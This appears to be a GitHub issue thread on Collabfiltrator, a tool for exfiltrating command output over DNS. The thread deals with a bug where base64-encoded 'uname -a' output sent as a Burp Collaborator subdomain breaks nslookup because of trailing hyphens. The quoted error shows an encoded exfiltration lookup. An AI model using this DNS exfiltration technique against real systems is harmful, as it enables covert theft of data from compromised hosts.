### ISSUE TITLE
not a legal IDNA2008 name

### ISSUE THREAD

**Issue by hundan2020** [0xC01DF00D/Collabfiltrator#6]
try with `uname -a`

the latest query answered `nslookup: '0002.IwMjAgeDg2XzY0IHg4Nl82NCB4ODZfNjQgR05VL0xpbnV4Cg--.qlf4micc549hcl8h7lsec8ktjkpmdb.burpcollaborator.net' is not a legal IDNA2008 name (string start/ends with forbidden hyphen), use +noidnin`

**Comment by 0xC01DF00D** [comment]
I will look into this.

**Comment by 0xC01DF00D** [comment]
Okay, I think that has to do with base64 payloads ending in a +. I made the mistake of changing + to PLUS which is 3 characters too long. I will fix this.

**Comment by landaboot** [comment]
> try with `uname -a`
> 
> the latest query answered `nslookup: '0002.IwMjAgeDg2XzY0IHg4Nl82NCB4ODZfNjQgR05VL0xpbnV4Cg--.qlf4micc549hcl8h7lsec8ktjkpmdb.burpcollaborator.net' is not a legal IDNA2008 name (string start/ends with forbidden hyphen), use +noidnin`

I am getting the same error as you

**Comment by 0xC01DF00D** [comment]
Yes, this should be fixed within the next update.

**Comment by 0xC01DF00D** [comment]
I found this problem again with URLs ending with - or -- when punycode domain lookups aren't supported on the system. I'm experimenting with solutions for this.

**Comment by 0xC01DF00D** [comment]
Fixed in 2.1 update.
